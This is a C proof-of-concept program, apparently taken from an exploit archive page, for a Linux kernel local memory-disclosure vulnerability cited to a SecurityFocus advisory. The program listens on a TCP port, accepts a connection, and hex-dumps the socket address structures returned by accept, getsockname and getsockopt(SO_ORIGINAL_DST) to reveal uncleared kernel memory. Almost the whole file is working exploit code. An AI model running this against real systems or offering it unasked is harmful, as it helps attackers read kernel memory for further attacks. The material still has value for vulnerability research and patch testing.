89 lines
No EOL
1.9 KiB
C
89 lines
No EOL
1.9 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/17203/info
|
|
|
|
The Linux kernel is affected by local memory-disclosure vulnerabilities. These issues are due to the kernel's failure to properly clear previously used kernel memory before returning it to local users.
|
|
|
|
These issues allow an attacker to read kernel memory and potentially gather information to use in further attacks.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <netinet/in.h>
|
|
#include <linux/netfilter_ipv4.h>
|
|
|
|
void
|
|
dump(const unsigned char *p, unsigned l)
|
|
{
|
|
printf("data:");
|
|
while (l > 0) {
|
|
printf(" %02x", *p);
|
|
++p; --l;
|
|
}
|
|
printf("\n");
|
|
}
|
|
|
|
int
|
|
main(int argc, char **argv)
|
|
{
|
|
int port;
|
|
int ls, as, r, one;
|
|
struct sockaddr_in sa;
|
|
socklen_t sl;
|
|
|
|
if (argc != 2 || (port = atoi(argv[1])) == 0) {
|
|
fprintf(stderr, "usage: bug PORT\n");
|
|
return (1);
|
|
}
|
|
|
|
ls = socket(PF_INET, SOCK_STREAM, 0);
|
|
if (ls == -1) {
|
|
perror("ls = socket");
|
|
return (1);
|
|
}
|
|
one = 1;
|
|
r = setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
|
|
if (r == -1) {
|
|
perror("setsockopt(ls)");
|
|
return (1);
|
|
}
|
|
sa.sin_family = PF_INET;
|
|
sa.sin_addr.s_addr = INADDR_ANY;
|
|
sa.sin_port = htons(port);
|
|
r = bind(ls, (struct sockaddr *) &sa, sizeof(sa));
|
|
if (r == -1) {
|
|
perror("bind(ls)");
|
|
return (1);
|
|
}
|
|
r = listen(ls, 1);
|
|
if (r == -1) {
|
|
perror("listen(ls)");
|
|
return (1);
|
|
}
|
|
|
|
sl = sizeof(sa);
|
|
as = accept(ls, (struct sockaddr *) &sa, &sl);
|
|
if (as == -1) {
|
|
perror("accept(ls)");
|
|
return (1);
|
|
}
|
|
dump((unsigned char *) &sa, sizeof(sa));
|
|
|
|
sl = sizeof(sa);
|
|
r = getsockname(as, (struct sockaddr *) &sa, &sl);
|
|
if (r == -1) {
|
|
perror("getsockname(as)");
|
|
return (1);
|
|
}
|
|
dump((unsigned char *) &sa, sizeof(sa));
|
|
|
|
sl = sizeof(sa);
|
|
r = getsockopt(as, SOL_IP, SO_ORIGINAL_DST, (struct sockaddr *) &sa, &sl);
|
|
if (r == -1) {
|
|
perror("getsockname(as)");
|
|
return (1);
|
|
}
|
|
dump((unsigned char *) &sa, sizeof(sa));
|
|
|
|
return (0);
|
|
} |